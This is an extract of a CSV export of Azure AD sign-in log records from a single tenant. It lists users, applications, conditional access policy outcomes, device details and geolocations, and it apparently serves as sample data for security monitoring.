+737,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:40.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ffc66140-5bc6-47b9-9d75-899979adcc03,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",80d584c4-dd35-4dcb-882c-05934c260c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,80d584c4-dd35-4dcb-882c-05934c260c00,SigninLogs,Sucess,50.6406517,5.572050095
+738,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:38.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,75104a07-0166-4705-8b05-6064cadcd4b7,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office Online Client AAD- Maker,17d5e35f-655b-4fb0-8ae6-86356e9a49f5,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d4fae351-3d73-4ab0-b2af-7ae119ae0c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office Scripts Service,d4fae351-3d73-4ab0-b2af-7ae119ae0c00,SigninLogs,Sucess,50.6406517,5.572050095
+739,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:44.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,108a7bc4-64fe-45e5-858f-628a45a0e497,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d4fae351-3d73-4ab0-b2af-7ae1d8aa0c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,d4fae351-3d73-4ab0-b2af-7ae1d8aa0c00,SigninLogs,Sucess,50.6406517,5.572050095
+740,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:48.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a43aa7e1-af32-4941-b7eb-3e4289b53756,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d4fae351-3d73-4ab0-b2af-7ae112ab0c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,d4fae351-3d73-4ab0-b2af-7ae112ab0c00,SigninLogs,Sucess,50.6406517,5.572050095
+741,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:10.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,55d5dd3f-42a7-4f44-89be-dd19d82bb6d6,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 08:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b6b1e129-7976-4148-98ee-f60596550e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b6b1e129-7976-4148-98ee-f60596550e00,SigninLogs,Sucess,36.6404686,-78.26995087
+742,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:16.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50126,None,Invalid username or password or Invalid on-premise username or password.,0,832ae38e-2940-4bea-93f6-bb25f6131b3f,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,[],notApplied,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",b58c6208-3745-40bc-8745-ecaa883c1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 50126, 'failureReason': 'Invalid username or password or Invalid on-premise username or password.'}",Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b58c6208-3745-40bc-8745-ecaa883c1600,SigninLogs,Failed,41.90428925,-85.99833679
+743,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:25.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,88879f29-b912-4faf-b37c-f8ae402684d5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",86807d56-c656-4319-9bdc-577eecce1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,86807d56-c656-4319-9bdc-577eecce1300,SigninLogs,Sucess,33.7984581,-84.38828278
+744,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:28.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bbc03de8-5534-403d-9574-833e452780c9,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d57fb780-1a14-4a75-9a44-f6b037941600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,d57fb780-1a14-4a75-9a44-f6b037941600,SigninLogs,Sucess,41.90428925,-85.99833679
+745,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:57.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,2c52b82e-8f80-4fed-88d5-4ec394a5bb4d,Microsoft.aadiam,Microsoft.aadiam,,e6b6e92d-8fef-4931-957a-03f9f23b11ce,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,[],notApplied,09/04/2020 08:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",852b7259-19f0-4fe6-8658-d6f543e05200,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",e6b6e92d-8fef-4931-957a-03f9f23b11ce,e6b6e92d-8fef-4931-957a-03f9f23b11ce,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,852b7259-19f0-4fe6-8658-d6f543e05200,SigninLogs,Failed,32.32146072,34.85319901
+746,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:39.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 